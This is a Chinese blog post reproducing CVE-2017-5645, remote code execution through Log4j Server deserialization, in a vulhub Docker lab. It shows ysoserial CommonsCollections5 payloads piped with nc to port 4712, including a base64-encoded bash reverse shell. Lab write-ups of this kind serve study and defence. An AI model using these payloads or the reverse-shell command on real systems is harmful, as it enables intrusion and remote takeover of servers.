Apache Log4j Server 反序列化命令执行漏洞(CVE-2017-5645)复现

admin 2021年5月13日20:45:44评论389 views字数 726阅读2分25秒阅读模式

漏洞概述

 

Apache Log4j是一个用于Java的日志记录库,其支持启动远程日志服务器。Apache Log4j 2.8.2之前的2.x版本中存在安全漏洞。攻击者可利用该漏洞执行任意代码。

 

环境搭建

 

这里使用vulhub来搭建环境

https://github.com/vulhub/vulhub/tree/master/log4j/CVE-2017-5645


进入目录并启动环境cd vulhub-master/log4j/CVE-2017-5645/docker-compose up -d

Apache Log4j Server 反序列化命令执行漏洞(CVE-2017-5645)复现

环境启动后,将在4712端口开启一个TCPServer。

Apache Log4j Server 反序列化命令执行漏洞(CVE-2017-5645)复现


漏洞复现

 

我们使用ysoserial生成payload,然后直接发送给your-ip:4712端口即可。

java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsCollections5 "touch /tmp/success" | nc 192.168.204.138 4712

Apache Log4j Server 反序列化命令执行漏洞(CVE-2017-5645)复现

进入容器

docker exec -it 69272f8d8ae8 /bin/bash


执行了命令

再试试反弹shell

java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsCollections5 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIwNC4xMzgvNjY2NiAwPiYx}|{base64,-d}|{bash,-i}" | nc 192.168.204.138 4712 

Apache Log4j Server 反序列化命令执行漏洞(CVE-2017-5645)复现

 

修复建议

 

升级到安全版本


本文始发于微信公众号(锋刃科技):Apache Log4j Server 反序列化命令执行漏洞(CVE-2017-5645)复现

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年5月13日20:45:44
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Apache Log4j Server 反序列化命令执行漏洞(CVE-2017-5645)复现https://cn-sec.com/archives/256854.html

发表评论

匿名网友 填写信息